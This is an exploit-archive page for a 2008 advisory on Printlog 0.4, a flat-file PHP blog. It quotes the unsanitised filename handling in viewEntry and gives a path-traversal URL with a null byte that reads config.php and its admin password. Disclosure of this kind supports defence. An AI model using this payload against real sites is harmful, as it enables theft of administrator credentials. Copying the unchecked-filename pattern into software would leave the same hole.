header-logo
Suggest Exploit
vendor:
Printlog
by:
Pepelux
7.5
CVSS
HIGH
Remote File Edition Vulnerability
22
CWE
Product Name: Printlog
Affected Version From: 0.4
Affected Version To: 0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:hardkap:printlog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Printlog <= 0.4: Remote File Edition Vulnerability

You can navigate and see the entries. Something like as: http://localhost/p/index.php?option=viewEntry&filename=00001. Code doesn't check the comments directory. If magic quotes are off you can do: http://localhost/p/index.php?option=viewEntry&filename=../config.php%00. config.php has the admin password.

Mitigation:

Ensure that the application is configured to use magic quotes and that the comments directory is properly checked.
Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Printlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$ Program: Printlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog


Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org

-- Description (by the author's page) --
PRITLOG is an extremely simple, small and powerful blog system. It does not 
use or need a MYSQL database and fully works based on flat files. The idea 
is derived from a similar app called PPLOG.

-- Bug --
You can navigate and see the entries. Something like as:
  http://localhost/p/index.php?option=viewEntry&filename=00001

Code doesn't check the comments directory:

709.  function viewEntry() {
710.	$fileName   = isset($_POST['filename'])?$_POST['filename']:$_GET['filename'];
711.	global $postdir, $separator, $newPostFile, $newFullPostNumber, $debugMode, $config_textAreaCols, $config_textAreaRows;
712.	global $config_allowComments, $config_commentsSecurityCode, $config_CAPTCHALength, $config_randomString;
713.	global $commentdir,$config_dbFilesExtension, $config_onlyNumbersOnCAPTCHA;
714.	$viewFileName=$postdir.$fileName.$config_dbFilesExtension;


-- Exploit --
If magic quotes are off you can do:
  http://localhost/p/index.php?option=viewEntry&filename=../config.php%00

config.php has the admin password

# milw0rm.com [2008-09-30]